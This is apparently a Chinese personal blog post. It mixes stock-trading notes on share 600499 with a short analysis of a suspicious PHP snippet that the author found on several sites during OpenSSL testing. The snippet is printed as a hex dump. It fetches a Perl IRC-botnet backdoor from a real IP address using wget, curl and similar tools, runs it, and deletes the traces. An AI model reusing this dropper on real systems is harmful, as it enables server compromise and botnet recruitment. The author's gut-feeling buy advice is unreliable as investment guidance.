前几天女朋友要我关注600499的科达机电
我看了一下k线,高峰跌下去不少,反弹也挺强,这种时候可以顺势低吸一下
看了下大概应该埋单的位置,第六感告诉我,今天可以在19.8买入
于是早上就挂了19.8的买单,就继续去做测试了
在做openssl测试的时候,在不下5个网站见到这样的可疑代码片段:
.<?php
0290: 65 63 68 6F 20 22 43 6F 6E 74 65 6E 74 2D 54 79 echo "Content-Ty
02a0: 70 65 3A 74 65 78 74 2F 68 74 6D 6C 5C 72 5C 6E pe:text/html\r\n
02b0: 5C 72 5C 6E 22 3B 65 63 68 6F 20 22 62 75 6E 34 \r\n";echo "bun4
02c0: 22 2E 70 68 70 5F 75 6E 61 6D 65 28 29 2E 22 73 ".php_uname()."s
02d0: 74 30 70 22 3B 73 79 73 74 65 6D 28 22 63 64 20 t0p";system("cd
02e0: 2F 74 6D 70 3B 77 67 65 74 20 68 74 74 70 3A 2F /tmp;wget http:/
02f0: 2F 32 31 33 2E 32 31 35 2E 31 35 39 2E 37 32 2F /213.215.159.72/
0300: 7E 61 65 77 69 74 2F 2E 70 3B 63 75 72 6C 20 2D ~aewit/.p;curl -
0310: 4F 20 68 74 74 70 3A 2F 2F 32 31 33 2E 32 31 35 O http://213.215
0320: 2E 31 35 39 2E 37 32 2F 7E 61 65 77 69 74 2F 2E .159.72/~aewit/.
0330: 70 3B 66 65 74 63 68 20 68 74 74 70 3A 2F 2F 32 p;fetch http://2
0340: 31 33 2E 32 31 35 2E 31 35 39 2E 37 32 2F 7E 61 13.215.159.72/~a
0350: 65 77 69 74 2F 2E 70 3B 6C 77 70 2D 64 6F 77 6E ewit/.p;lwp-down
0360: 6C 6F 61 64 20 68 74 74 70 3A 2F 32 31 33 2E 32 load http:/213.2
0370: 31 35 2E 31 35 39 2E 37 32 2F 7E 61 65 77 69 74 15.159.72/~aewit
0380: 2F 2E 70 20 2E 70 3B 70 65 72 6C 20 2E 70 3B 70 /.p .p;perl .p;p
0390: 65 72 6C 20 2E 70 3B 72 6D 20 2D 72 66 20 2E 70 erl .p;rm -rf .p
03a0: 3B 72 6D 20 2D 72 66 20 2E 70 2E 2A 22 29 3B 65 ;rm -rf .p.*");e
03b0: 78 69 74 3B 20 3F 3E A5 E8 A0 82 9E 4E 57 42 DC xit; ?>
不同网站对于上面url可能有部分不同,但大体格式都是这样
php部分功能很简单,就是下载一个perl脚本,然后执行它,最后清除痕迹。
那个perl脚本,原地址是http://213.215.159.72/~aewit/.p
重点是perl代码的部分,看起来是一个僵尸网络的后门脚本,它会加入irc聊天室($servidor=‘irc.uid0.su‘ unless $servidor;),然后接受攻击者的控制,执行一些扫描或攻击。(详见perl代码)
然后还会开启一个https服务
中午累了,休息一下睡觉前看有跳水的姿势,看起来今天能成交
睡了觉起来,发现果然成交了
明日操作策略,早盘埋上20.5卖单,然后继续去忙测试
成交了就继续挂低单买
整体上发表下看法,短期很难跌下去了,该买就买吧
爱Gail
0
评论(5)
收藏
展开
